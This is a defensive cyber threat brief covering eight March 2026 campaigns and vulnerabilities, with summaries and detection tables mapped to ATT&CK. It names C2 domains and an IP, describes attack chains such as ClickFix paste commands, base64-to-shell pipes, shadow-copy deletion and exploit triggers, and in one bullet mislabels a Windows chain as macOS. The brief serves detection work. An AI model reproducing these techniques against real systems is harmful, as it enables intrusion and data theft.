Previous brief: Cyber Threat Brief — March 17 2026
1. LeakNet Ransomware: ClickFix + Deno “Bring Your Own Runtime” Chain
Summary
LeakNet has graduated from buying access to making their own — and they brought JavaScript along for the ride. The group now delivers ClickFix lures via compromised websites, then uses the legitimate Deno JS/TS runtime to execute Base64-encoded payloads directly in memory, skipping disk and blending into developer tooling noise. ReliaQuest published full technical details on March 17, calling the tactic “BYOR” (Bring Your Own Runtime). The consistency of the post-exploitation sequence is LeakNet’s biggest weakness for defenders.
What’s New (Last 24 Hours)
- ReliaQuest published full technical breakdown of LeakNet’s new initial access chain (ClickFix via compromised legitimate sites) and Deno-based in-memory loader
- Attack scripts confirmed as
Romeo*.ps1 (VBS initiator) and Juliet*.vbs naming pattern
- Post-exploitation sequence: DLL sideloading via
jli.dll loaded by Java from C:\ProgramData\USOShared, credential discovery via klist, lateral movement via PsExec, and exfiltration to Amazon S3 buckets
- ClickFix lure delivers fake CAPTCHA that instructs user to paste
msiexec.exe command into Windows Run dialog
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
msiexec.exe spawned from browser or Run dialog | Process | T1218.007 – Msiexec | EDR Process Create | Alert on msiexec.exe with unusual parent (browser, explorer triggered by Run) |
Romeo*.ps1 / Juliet*.vbs file naming pattern | File | T1059.001 – PowerShell | EDR File Create / Script Block Logs | Hunt for VBS/PS1 files with Romeo or Juliet in name in temp/user dirs |
| Deno.exe executing outside development directories | Process | T1204.002 – Malicious File | EDR Process Create | Alert on deno.exe execution from non-dev paths (AppData, ProgramData, Temp) |
| Base64-encoded JavaScript payload executed in memory via Deno | TTP | T1027 – Obfuscated Files or Information | EDR Memory / Script Block Logs | Hunt for deno.exe with --eval or inline base64 args |
jli.dll loaded by java.exe from C:\ProgramData\USOShared | File / DLL | T1574.002 – DLL Side-Loading | EDR Image Load | Alert on java.exe loading DLLs from ProgramData\USOShared |
klist execution for Kerberos ticket enumeration | Command | T1558 – Steal or Forge Kerberos Tickets | EDR Process Create | Alert on klist.exe spawned from non-admin or scripted context |
| PsExec used for lateral movement post-compromise | Tool | T1570 – Lateral Tool Transfer | EDR Process Create / Network | Alert on psexec.exe or psexesvc.exe outside authorized admin windows |
| Outbound traffic to Amazon S3 buckets for exfiltration | Network | T1567.002 – Exfiltration to Cloud Storage | Proxy / Firewall | Detect high-volume outbound to s3.amazonaws.com from non-cloud workloads |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
Summary
A sophisticated multi-variant campaign — now called “Claude Fraud” by 7AI — is targeting developers and security practitioners by exploiting the Claude.ai and VS Code brands. Two confirmed attack paths: a macOS Google Ads vector delivering the MacSync infostealer via a ClickFix-style terminal command, and a trojanized VS Code extension executing PowerShell silently on Windows. Over 15,600 documented victims publicly. The attack is clever precisely because it targets people who should know better — and currently active Squarespace-hosted fake pages are still live.
What’s New (Last 24 Hours)
- 7AI Threat Research published full technical breakdown covering both macOS and Windows attack paths (March 17)
- Two confirmed C2 domains:
a2abotnet[.]com (macOS/MacSync) and claude-code.official-version[.]com (Windows); wildcard block recommended: *.official-version[.]com
- macOS:
Code.exe → powershell.exe → mshta.exe with remote URL as primary Windows detection signal
- macOS detection signal:
osascript spawned following curl or base64 decode execution
- MacSync targets macOS Keychain, browser credentials, session cookies, and crypto wallets; sends via HTTP POST with hardcoded auth token
- The original claude.ai artifact vector was taken down; operators immediately pivoted to a Squarespace-hosted fake page within the same ad campaign
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
a2abotnet[.]com | C2 Domain | T1071.001 – Web Protocols | DNS / Proxy | Block and alert on any DNS resolution or HTTP traffic |
claude-code.official-version[.]com | C2 Domain | T1071.001 – Web Protocols | DNS / Proxy | Block immediately; wildcard block *.official-version[.]com |
Code.exe → powershell.exe → mshta.exe with remote URL | Process Chain | T1218.005 – Mshta | EDR Process Create | Alert on Code.exe (VS Code) spawning powershell.exe which spawns mshta.exe with URL argument |
osascript spawned after curl or base64 decode | Process | T1059.002 – AppleScript | EDR (macOS) | Hunt for osascript execution with parent curl or shell decode context |
| Base64-encoded bash command from terminal (macOS ClickFix) | Command | T1059.004 – Unix Shell | EDR (macOS) Process / Shell Logs | Alert on bash -c with base64 -d piped to sh/bash in interactive terminal sessions |
| MacSync HTTP POST with hardcoded auth token to C2 | Network | T1041 – Exfiltration Over C2 Channel | Proxy / NDR | Detect POST requests to a2abotnet[.]com; look for User-Agent spoofing macOS browser strings |
| Trojanized VS Code extension installing silently | File | T1176 – Browser Extensions | EDR File / Registry | Monitor VS Code extension installs outside marketplace or with unusual publisher certs |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
3. Payload Ransomware: Babuk Derivative with ESXi Targeting and ETW Blinding
Summary
A new ransomware group calling itself “Payload” emerged in February and is already hitting hospitals, energy companies, and telecom providers across seven countries. The Windows binary is a well-implemented Babuk derivative using Curve25519 + ChaCha20, and it comes with an ESXi locker that parses vmInventory to find and encrypt VMs in parallel. Its self-removal via NTFS alternate data streams and ETW patching to blind EDRs make it a serious hunting challenge. The in-memory string MakeAmericaGreatAgain and the FBIthread-pool-%d / expand 32-byte kFBI constants are reliable detection anchors.
What’s New (Last 24 Hours)
- GBHackers published reverse engineering analysis on March 17 with confirmed detection signatures
- Group claimed Royal Bahrain Hospital as victim (110 GB exfiltrated, deadline March 23)
- Total claimed victims: 12 organizations, 2,603 GB stolen data
- ESXi locker confirmed: uses
vmInventory parsing for VM disk targeting via threaded encryption
- Windows binary kills backup/security tools, deletes shadow copies, wipes event logs, and patches ETW functions to blind endpoint detection
- Binary self-removes via NTFS alternate data stream trick
- Mutex name:
MakeAmericaGreatAgain — unique and detectable
- Many AV engines currently mislabeling as Babuk due to code reuse
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
Mutex: MakeAmericaGreatAgain | Mutex | T1486 – Data Encrypted for Impact | EDR / Memory | Hunt for processes creating this mutex — high-confidence Payload indicator |
In-memory string expand 32-byte kFBI (Windows) | Memory Artifact | T1486 – Data Encrypted for Impact | EDR Memory Scan / YARA | YARA rule: scan memory for expand 32-byte kFBI string adjacent to ChaCha20 sigma constant |
FBIthread-pool-%d string in Linux/ESXi ELF binary | Memory Artifact | T1486 – Data Encrypted for Impact | YARA / AV / EDR (Linux) | Scan ESXi host memory and staging paths for FBIthread-pool string pattern |
.payload file extension appended to encrypted files | File | T1486 – Data Encrypted for Impact | EDR File Create | Alert on rapid mass file renaming with .payload extension |
| Shadow copy deletion via vssadmin or PowerShell | Command | T1490 – Inhibit System Recovery | EDR Process Create | Alert on vssadmin.exe delete shadows or WMI-based shadow deletion |
| ETW patching to disable EDR telemetry | TTP | T1562.001 – Disable or Modify Tools | EDR / Kernel Telemetry | Monitor for NtTraceControl or WriteProcessMemory targeting ntdll ETW functions |
vmInventory file access on ESXi hosts | File Access | T1082 – System Information Discovery | ESXi Syslog / File Audit | Alert on unexpected processes reading /vmfs/volumes/*/vmInventory |
| Ransom note creation across file shares | File | T1486 – Data Encrypted for Impact | EDR File Create | Alert on bulk creation of identically-named TXT/HTML files across shares |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
4. Chrome Zero-Days CVE-2026-3909 & CVE-2026-3910 Added to CISA KEV
Summary
Google patched two zero-days in Chrome that are actively being exploited in the wild — both now in the CISA KEV catalog with a federal patch deadline of March 27. CVE-2026-3909 is an out-of-bounds write in Skia (the 2D graphics library), and CVE-2026-3910 is an improper restriction flaw in the V8 JavaScript engine. Both are drive-by exploits: a victim browses to a crafted page and the exploit fires silently. CISA has not confirmed ransomware use, but memory corruption primitives like these are standard precursors to sandbox escape and code execution.
What’s New (Last 24 Hours)
- CISA added both CVE-2026-3909 (Skia OOB write) and CVE-2026-3910 (V8 improper restriction) to KEV on March 17
- Federal deadline for patching: March 27, 2026
- Exploit delivery vector: malicious/compromised HTML page — no user interaction beyond browsing required
- CVE-2026-3909 confirmed exploitable via remotely crafted HTML, leading to memory corruption and potential code execution
- CVE-2026-3910 targets V8 sandbox restrictions within Chromium’s JavaScript engine
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| Chrome/Chromium processes spawning unexpected child processes after page load | Process | T1203 – Exploitation for Client Execution | EDR Process Create | Alert on chrome.exe or chromium spawning shell, cmd, powershell, or network tools as children |
| Outbound connections from renderer process to non-CDN IPs after browse event | Network | T1189 – Drive-by Compromise | EDR Network / NDR | Monitor for unexpected outbound from Chrome renderer sandbox processes |
| Chrome version below patched build on endpoints | Software | T1203 – Exploitation for Client Execution | Asset Inventory / Endpoint Management | Immediately identify and patch all Chromium-based browsers (Chrome, Edge, Opera); check version via google-chrome --version |
| Suspicious browser child process spawned on macOS | Process | T1203 – Exploitation for Client Execution | EDR (macOS) | Suspicious Browser Child Process Elastic rule fires when Chrome spawns unexpected binaries |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | Cisco Secure Firewall - Citrix NetScaler Memory Overread Attempt | No direct Splunk rule for Chrome memory exploitation; network-layer coverage via firewall rules blocking malicious page sources; deploy browser version compliance checks via Splunk UBA or asset inventory |
| Elastic | Suspicious Browser Child Process | Covers post-exploitation child process spawning from Chrome on macOS; this is the highest-value existing detection for browser exploit post-exploitation |
| Sigma | Suspicious Browser Child Process - MacOS | Covers macOS Chrome child process anomalies; no Windows Sigma rule specifically targets Chromium renderer sandbox escape child processes — custom rule recommended for chrome.exe spawning cmd/powershell |
Sources
5. Wing FTP Server CVE-2025-47813 Added to CISA KEV — Attack Chain Enabler
Summary
CISA added CVE-2025-47813 to KEV on March 16 — a medium-severity info-disclosure bug in Wing FTP Server that leaks the local installation path via a malformed UID cookie on /loginok.html. By itself, meh. But paired with CVE-2025-47812 (CVSS 10.0, already weaponized since July 2025 to run Lua payloads and install RMM tools), this becomes a reliable two-step attack chain: path disclosure unlocks the RCE. Patch deadline for federal agencies: March 30.
What’s New (Last 24 Hours)
- CISA formally added CVE-2025-47813 to KEV catalog (March 16/17 reporting window)
- Aviatrix TRC analysis confirmed: attackers are chaining CVE-2025-47813 path disclosure with CVE-2025-47812 RCE for privilege escalation and lateral movement
- Exploitation path: authenticated request to
/loginok.html with oversized UID cookie value → error message reveals local server path → path used to target CVE-2025-47812 RCE
- Prior CVE-2025-47812 exploitation involved downloading malicious Lua files, reconnaissance, and RMM tool installation
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
HTTP GET/POST to /loginok.html with oversized UID cookie | Web Request | T1190 – Exploit Public-Facing Application | Web/App Server Logs | Alert on requests to /loginok.html with UID cookie value length > OS max path (260 bytes Windows, 4096 Linux) |
| Wing FTP Server error response containing local file path | Log Pattern | T1190 – Exploit Public-Facing Application | Web/App Server Logs | Look for Wing FTP error log entries containing full filesystem paths — these indicate CVE-2025-47813 triggering |
| Unexpected Lua file execution within Wing FTP context | Process | T1059 – Command and Scripting Interpreter | EDR Process Create | Alert on lua.exe or lua script execution spawned from Wing FTP server processes |
| RMM tool installation (Atera, AnyDesk, etc.) after FTP exploitation | Process | T1219 – Remote Access Software | EDR Process Create | Hunt for RMM installers executed from Wing FTP server working directory |
| Wing FTP Server version ≤ 7.4.3 | Software | T1190 – Exploit Public-Facing Application | Asset Inventory | Inventory all Wing FTP deployments; patch to ≥ 7.4.4 immediately |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
6. ACRStealer + HijackLoader: NT Syscall Evasion and AFD-Based C2
Summary
G DATA published a deep analysis of ACRStealer (now integrated into HijackLoader infrastructure) showing a significant evasion upgrade: the malware has ditched Win32 API calls in favor of raw NTCalls and WoW64 syscalls to bypass user-mode hooks. It’s also swapped its C2 comms from Dead Drop Resolver to NTSockets via the Ancillary Function Driver (AFD), blending with legitimate HTTPS. Steam accounts, Chrome cookies, and DPAPI-protected browser credentials are primary targets. Published March 12, within the 24h window via the X/ETLabs threat intelligence summary from March 17.
What’s New (Last 24 Hours)
- G DATA full technical analysis surfaced via ETLabs threat intelligence summary (March 17)
- C2 communication shifted from Dead Drop Resolver to NTSockets / Ancillary Function Driver (AFD) to avoid high-level API detection
- Malware locates ntdll.dll, resolves functions via modified djb2 hash, uses WoW64 transition gate to bypass user-mode hooks
- App Bound Encryption bypass to extract raw AES master keys from browser versions that implement it
- PowerShell used for secondary payload execution and process hollowing
- Renamed compiled binary to
hex on victim hosts
- Active IOCs: 13 files, 1 IP, 1 domain, 1 URL, 2 hashes (retrieve from G DATA report)
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
Process named hex executing from user-writable paths | Process | T1036.005 – Match Legitimate Name or Location | EDR Process Create | Alert on hex.exe or hex process from AppData, Temp, or Downloads — not standard system binary |
| NTSocket / AFD driver direct calls from non-system processes | API | T1071.001 – Web Protocols | Kernel Telemetry / EDR | Monitor for processes making direct AFD syscalls (NtDeviceIoControlFile targeting \Device\Afd) outside browser/system context |
| ntdll.dll loaded and function enumerated via modified djb2 hash | Memory | T1055 – Process Injection | EDR Memory Scan | Hunt for processes that load ntdll, resolve exports dynamically (no import table entries) — behavior visible via ETW |
| DPAPI CryptUnprotectData called from non-browser process | API | T1555.003 – Credentials from Web Browsers | EDR API Monitor | Alert on CryptUnprotectData called by non-browser processes accessing %APPDATA%\Local\Google\Chrome\User Data |
| PowerShell spawned for process hollowing / secondary payload | Process | T1059.001 – PowerShell | EDR Process Create | Alert on powershell.exe spawned with encoded command or from non-admin parent in user context |
| Steam session files accessed from non-Steam process | File Access | T1552.001 – Credentials in Files | EDR File Access | Alert on reads to %LOCALAPPDATA%\Steam\config\loginusers.vdf from non-steam.exe processes |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
7. CVE-2026-32746: Critical Unpatched GNU InetUtils telnetd RCE (CVSS 9.8)
Summary
A critical out-of-bounds write vulnerability in the GNU InetUtils telnet daemon (telnetd) allows an unauthenticated remote attacker to execute arbitrary code with root privileges — no credentials needed, no user interaction required. The flaw resides in the LINEMODE Set Local Characters (SLC) suboption handler and is exploitable during the initial connection handshake, before any login prompt appears. Since telnetd typically runs as root under inetd/xinetd, successful exploitation gives immediate root access. No patch is available yet (expected by April 1, 2026). Israeli cybersecurity firm Dream discovered and disclosed the flaw on March 11, with public technical details published March 18.
What’s New (Last 24 Hours)
- Full technical details published March 18 by multiple sources including The Hacker News, CybersecurityNews, and GBHackers
- CVE-2026-32746 assigned with CVSS 9.8 — maximum network exploitability
- Exploitation occurs during the initial Telnet option negotiation phase (before authentication), meaning standard login audit logs will NOT capture the attack
- All GNU InetUtils versions through 2.7 are vulnerable (versions 1.9.3 through 2.7 confirmed)
- No patch available — fix expected no later than April 1, 2026
- The attack vector is a specially crafted LINEMODE SLC suboption message with oversized payload sent during connection handshake
- CWE-77 (command injection) classification
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| LINEMODE SLC suboption with payload > 90 bytes on port 23 | Network Signature | T1190 – Exploit Public-Facing Application | IDS/IPS (Snort/Suricata) | Deploy IDS rule: alert on Telnet LINEMODE SLC suboption negotiation packets exceeding 90 bytes — this is the pre-auth exploit trigger |
| Inbound connections to port 23 from external IPs | Network | T1190 – Exploit Public-Facing Application | Firewall / Network Flow | Immediately audit all internet-facing port 23 services; block external access to Telnet where possible |
Unexpected shell spawning from in.telnetd or telnetd process | Process | T1059 – Command and Scripting Interpreter | EDR Process Create | Alert on telnetd spawning processes other than login shells (e.g., wget, curl, nc, python, perl) |
| New files created in /tmp or world-writable dirs by telnetd child process | File | T1105 – Ingress Tool Transfer | EDR File Create / Auditd | Monitor for file creation in /tmp or /dev/shm by processes with telnetd ancestry |
| GNU InetUtils version ≤ 2.7 on any host | Software | T1190 – Exploit Public-Facing Application | Asset Inventory | Inventory all systems running telnetd; disable or firewall-restrict immediately until patch is available |
| Lateral movement from compromised telnetd host (root shell) | TTP | T1021 – Remote Services | NDR / Auth Logs | Hunt for new SSH/RDP sessions originating FROM known telnetd hosts, especially with root-level credentials |
Potential Detection Coverage Based on MITRE ATT&CK Technique
MITRE ATT&CK Mapping
| Technique | ID | Phase |
|---|
| Exploit Public-Facing Application | T1190 | Initial Access |
| Command and Scripting Interpreter | T1059 | Execution |
| Ingress Tool Transfer | T1105 | Command and Control |
| Remote Services | T1021 | Lateral Movement |
Sources
8. Konni APT: EndRAT Deployment via Spear-Phishing and KakaoTalk Account Hijacking
Summary
North Korea-linked threat group Konni (also tracked as UAC-0149 in some frameworks) has been running a multi-stage espionage campaign targeting South Korean individuals involved in North Korean human rights work. The attack starts with a spear-phishing email delivering a malicious LNK file inside a ZIP archive, which quietly installs EndRAT (an AutoIt-based RAT), RftRAT, and RemcosRAT for layered persistence. The distinguishing feature: after compromising a host, Konni hijacks the victim’s KakaoTalk desktop session and selectively sends malicious files to trusted contacts — turning a compromised individual into a distribution node. Genians published the full technical analysis on March 16, with wide reporting on March 17.
What’s New (Last 24 Hours)
- Genians published full technical analysis of Konni’s integrated spear-phishing + KakaoTalk propagation campaign (March 16-17)
- Three RAT families confirmed on a single victim host: EndRAT (AutoIt), RftRAT, and RemcosRAT — indicating high-value target selection
- Initial LNK execution uses
cmd.exe to spawn 32-bit PowerShell via SysWOW64 directory path — a technique to sidestep 64-bit security controls
- PowerShell script locates the LNK file by matching a specific file size rather than hardcoded filename — resilient to renaming
- Persistence established via Windows scheduled tasks
- C2 infrastructure distributed across Finland, Japan, and the Netherlands; RftRAT C2 linked to known Konni IP
96.62.214[.]5 (Japan)
- Post-compromise: attacker maintained long-term access, exfiltrated internal documents, and weaponized KakaoTalk to propagate malware to the victim’s contacts using North Korea-themed filenames as lures
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
96.62.214[.]5 (Japan-based RftRAT C2) | C2 IP | T1071.001 – Web Protocols | Firewall / Proxy / NDR | Block and alert on any traffic to this IP — linked to historical Konni infrastructure |
LNK file inside ZIP attachment spawning cmd.exe → powershell.exe (SysWOW64) | Process Chain | T1059.001 – PowerShell | EDR Process Create | Alert on cmd.exe spawning powershell.exe from C:\Windows\SysWOW64 with LNK parent from user download/temp paths |
| PowerShell script that locates files by size rather than name | TTP | T1059.001 – PowerShell | Script Block Logs (4104) | Hunt for PowerShell scripts using Get-ChildItem with -Length or file size matching logic in script block logs |
| Scheduled task created for RAT persistence | Persistence | T1053.005 – Scheduled Task | EDR / Windows Event 4698 | Alert on scheduled tasks created by PowerShell or cmd.exe spawned from LNK execution context |
| EndRAT (AutoIt-compiled executable) | Malware | T1059.010 – AutoHotKey & AutoIT | EDR Process Create | Hunt for AutoIt-compiled executables (AutoIt3.exe or compiled .a3x) running from user-writable paths |
| RftRAT / RemcosRAT deployed alongside EndRAT | Malware | T1219 – Remote Access Software | EDR Process Create / Network | Monitor for RemcosRAT behavioral signatures (mutex patterns, registry run keys) and outbound connections to non-standard ports |
| KakaoTalk desktop application sending files to contacts without user interaction | Lateral / Propagation | T1534 – Internal Spearphishing | EDR Process / File Create | Alert on KakaoTalk process creating or sending files when no keyboard/mouse input is detected (automation indicator) |
| North Korea-themed document filenames sent via KakaoTalk | Social Engineering | T1566.001 – Spearphishing Attachment | Email/Messaging Gateway | Hunt for files with Korean-language North Korea-related filenames distributed through messaging platforms |
Potential Detection Coverage Based on MITRE ATT&CK Technique
MITRE ATT&CK Mapping
| Technique | ID | Phase |
|---|
| Spearphishing Attachment | T1566.001 | Initial Access |
| PowerShell | T1059.001 | Execution |
| Scheduled Task | T1053.005 | Persistence |
| Internal Spearphishing | T1534 | Lateral Movement |
| Remote Access Software | T1219 | Command and Control |
| Web Protocols | T1071.001 | Command and Control |
Sources